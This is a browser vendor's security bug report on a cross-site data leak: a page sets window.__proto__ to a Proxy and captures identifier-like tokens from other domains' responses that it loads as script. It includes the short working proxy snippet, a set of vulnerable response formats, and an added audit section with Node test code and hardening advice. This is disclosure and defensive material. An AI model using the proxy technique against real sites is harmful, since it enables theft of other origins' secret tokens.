Closed Bug 1099081 Opened 10 years ago Closed 10 years ago

Cross-site data leak using window.__proto__ = new Proxy

Categories: (Core :: Security, defect)

Tracking: RESOLVED DUPLICATE of bug 1048535

People: (Reporter: till, Unassigned)


Details: (Keywords: sec-moderate, wsec-disclosure)

Setting window.__proto__, it's possible to intercept data from other domains as long as the data consists of either a single token that's a valid JS identifier, or a list of such tokens. See https://twitter.com/steike/status/533198334547468288 for a POC.

It's actually even simpler to implement this using ES6-style proxies:

    window.__proto__ = new Proxy({}, {
      // every lookup of an unknown global name ends up in the proxy's traps
      get: function (target, name) { console.log(name); return true; },
      has: function (target, name) { return true; }
    });

Examples of request results this works for:

  "foo05120820e156c2f445f670759be64420" (from the original POC)
  "foo,bar"
  "foo, bar, baz"
  "foo;bar"
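The following is an added audit example, not code from the bug report. It reproduces the interception mechanism in Node without touching the real global object: a `with (proxy) { ... }` block resolves free identifiers through the same `has`/`get` traps that a Proxy installed as window.__proto__ would see, so it can be used to check which response bodies are exposed and to confirm that a JSON-object encoding is not (the function names and the sample bodies are assumptions).

```javascript
// Added example (not from the bug report). Simulates the lookup path of
// comment 0 in a sandbox: inside `with (sniffer)`, every free identifier
// is resolved through the proxy's `has` and `get` traps, exactly like an
// unresolved global lookup walks into a Proxy set as window.__proto__.

// Return the bare identifiers a hostile proxy would observe if `body`
// were executed as a script; [] when the body is not valid JS or performs
// no free identifier lookups.
function leakedTokens(body) {
  const seen = [];
  const sniffer = new Proxy({}, {
    has: () => true,                       // claim every name exists
    get: (target, name) => {
      if (typeof name === 'string') seen.push(name); // skip @@unscopables
      return true;                         // keep the script running
    },
  });
  try {
    // Sloppy-mode function so `with` is allowed; `body` is a test input.
    const run = new Function('sniffer', 'with (sniffer) {\n' + body + '\n}');
    run(sniffer);
  } catch (e) {
    // SyntaxError or runtime error: keep whatever was observed before it.
  }
  return seen;
}

// Audit verdict for one response body.
function isLeakable(body) {
  return leakedTokens(body).length > 0;
}

// Hardened encoding: a JSON object literal is a SyntaxError when run as a
// script (the `"key":` after `{` does not parse), so no lookup happens even
// if the response is pulled in via <script>.
function asNonExecutableJson(tokens) {
  return JSON.stringify({ tokens });
}

// Constructed response bodies modelled on the ones listed in the report.
const samples = {
  'foo05120820e156c2f445f670759be64420': true,
  'foo,bar': true,
  'foo, bar, baz': true,
  'foo;bar': true,
  '{"token":"foo05120820e156c2f445f670759be64420"}': false,
  '["foo","bar"]': false,
};
```

Serving such responses with a correct non-script Content-Type plus X-Content-Type-Options: nosniff stops the browser from executing them as script in the first place; the encoding check above is the belt to that suspender.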
Calling this sec-moderate (maybe even sec-low?) because it relies on a web app that is not securing its "secret tokens" in a best-practice way. Dan, can you think of something we could do about this?
Status: NEW → RESOLVED
Closed: 10 years ago
Resolution: --- → DUPLICATE
This bug has been marked as a duplicate of a restricted bug. If it's an exact duplicate, we should consider opening up bug 1048535.